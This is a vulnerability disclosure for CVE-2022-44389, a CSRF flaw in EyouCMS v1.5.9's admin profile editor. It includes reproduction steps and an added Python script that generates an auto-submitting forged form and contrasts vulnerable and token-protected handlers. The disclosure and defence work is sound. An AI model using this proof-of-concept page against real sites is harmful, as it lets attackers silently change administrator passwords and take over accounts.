CVE-2022-44389: EyouCMS v1.5.9 has a vulnerability, Cross-site request forgery(CSRF) · Issue #30 · weng-xianhu/eyoucms

EyouCMS V1.5.9-UTF8-SP1 was discovered to contain a Cross-Site Request Forgery (CSRF) via the Edit Admin Profile module. This vulnerability allows attackers to arbitrarily change Administrator account information.


EyouCMS v1.5.9 has a cross-site request forgery (CSRF) vulnerability in the back office, in the page used to edit the administrator's profile. The profile update request is accepted without any check that the administrator actually intended it, so it can be used to change personal information such as the administrator's password, mobile phone number and email address. To exploit it, an administrator who is logged in to the back office has to open a crafted HTML page.
1. Go to the back office -> Personal information. The current password is "admin123456".

2. Construct a request that changes the password, mobile phone number, email address and other basic information. The constructed web page (shown as a screenshot in the original issue, not reproduced here) uses CSRF to change the password to "csrftest", the mobile phone number to "11111111111" and the email address to "123@csrf.test".

3. View the administrator's profile: at this point the password is still "admin123456", and the other fields are as shown in the original screenshot.

4. While still logged in as the administrator, open the constructed web page, then return to the back office and view the administrator's profile again. The mobile phone number and email address have been changed via CSRF.

Verify that the password has been changed to "csrftest" by logging in with it: login succeeds.
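The following is an added example, not code from EyouCMS or from the issue author. It generates the kind of auto-submitting HTML page the steps above rely on, using the values from the report, and places it beside a toy model of the profile-update handler in two forms: the vulnerable one, which trusts the session cookie alone, and a hardened one that additionally requires a per-session synchronizer token and rejects a mismatched Origin header. The CMS origin, the endpoint URL and the form field names (`pwd`, `mobile`, `email`, `_csrf`) are assumptions made for illustration; the real EyouCMS parameter names are not given in the issue.

```python
# Added example (not EyouCMS code): CSRF proof-of-concept page generator plus
# a toy model of a vulnerable and a hardened profile-update handler.
# Origin, endpoint path and field names below are assumptions, not EyouCMS's.
import hmac
import html
import secrets

SITE_ORIGIN = "http://cms.example.test"  # assumed CMS origin
TARGET_URL = SITE_ORIGIN + "/admin/profile/edit"  # hypothetical endpoint
ATTACK_VALUES = {"pwd": "csrftest", "mobile": "11111111111", "email": "123@csrf.test"}


def build_csrf_page(action_url, fields):
    """Return an HTML page whose hidden form auto-submits `fields` to `action_url`.

    When a logged-in administrator opens it, the browser attaches the session
    cookie to the POST, which is all the vulnerable handler checks."""
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}">'
        for k, v in fields.items()
    )
    return (
        "<!doctype html>\n"
        '<html><body onload="document.forms[0].submit()">\n'
        f'  <form method="POST" action="{html.escape(action_url)}">\n'
        f"{inputs}\n"
        "  </form>\n"
        "</body></html>\n"
    )


class Admin:
    """Constructed administrator record with the starting password from the report."""
    def __init__(self):
        self.password = "admin123456"
        self.mobile = "13900000000"        # constructed placeholder
        self.email = "admin@example.test"  # constructed placeholder
        self.csrf_token = secrets.token_hex(16)  # per-session synchronizer token


class Request:
    """What the server sees: session cookie, the Origin header a browser sends
    with a form POST (None for clients that omit it), and the form body."""
    def __init__(self, cookie, form, origin=None):
        self.cookie = cookie
        self.form = form
        self.origin = origin


SESSIONS = {}  # cookie value -> Admin; filled by simulate()


def apply_profile(admin, form):
    admin.password = form.get("pwd", admin.password)
    admin.mobile = form.get("mobile", admin.mobile)
    admin.email = form.get("email", admin.email)


def vulnerable_update(req):
    """Model of the flaw: a valid session cookie is the only thing checked, so a
    cross-site POST that rides on the victim's cookie is accepted."""
    admin = SESSIONS.get(req.cookie)
    if admin is None:
        return False
    apply_profile(admin, req.form)
    return True


def hardened_update(req):
    """Same handler with CSRF defences: a present-but-foreign Origin is rejected,
    and the form must carry the token bound to the session (constant-time compare)."""
    admin = SESSIONS.get(req.cookie)
    if admin is None:
        return False
    if req.origin is not None and req.origin != SITE_ORIGIN:
        return False
    if not hmac.compare_digest(req.form.get("_csrf", ""), admin.csrf_token):
        return False
    apply_profile(admin, req.form)
    return True


def simulate():
    """Replay the report: the forged POST against both handlers, then a legitimate
    token-bearing POST against the hardened one. Returns the observed outcomes."""
    admin = Admin()
    SESSIONS["sid-victim"] = admin
    forged = Request("sid-victim", dict(ATTACK_VALUES), origin="http://attacker.test")
    vuln_ok = vulnerable_update(forged)
    pw_after_vuln = admin.password

    admin = Admin()  # fresh victim for the hardened run
    SESSIONS["sid-victim"] = admin
    hard_forged_ok = hardened_update(forged)
    pw_after_forged = admin.password
    legit = Request("sid-victim", {**ATTACK_VALUES, "_csrf": admin.csrf_token},
                    origin=SITE_ORIGIN)
    hard_legit_ok = hardened_update(legit)
    return {
        "vulnerable_accepted_forgery": vuln_ok,
        "password_after_vulnerable": pw_after_vuln,
        "hardened_accepted_forgery": hard_forged_ok,
        "password_after_hardened_forgery": pw_after_forged,
        "hardened_accepted_legit": hard_legit_ok,
        "password_after_legit": admin.password,
    }


if __name__ == "__main__":
    print(build_csrf_page(TARGET_URL, ATTACK_VALUES))
    for name, value in simulate().items():
        print(f"{name}: {value}")
```

Running the script prints the proof-of-concept page and then shows the forged request succeeding against `vulnerable_update` (password becomes "csrftest") and failing against `hardened_update`, while the same request with the session's `_csrf` value and the site's own Origin is accepted. The Origin check is a secondary defence only: it is skipped when the header is absent, so the synchronizer token is what the hardened handler actually relies on, and requiring the current password before any password change would be a further layer this model does not include.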
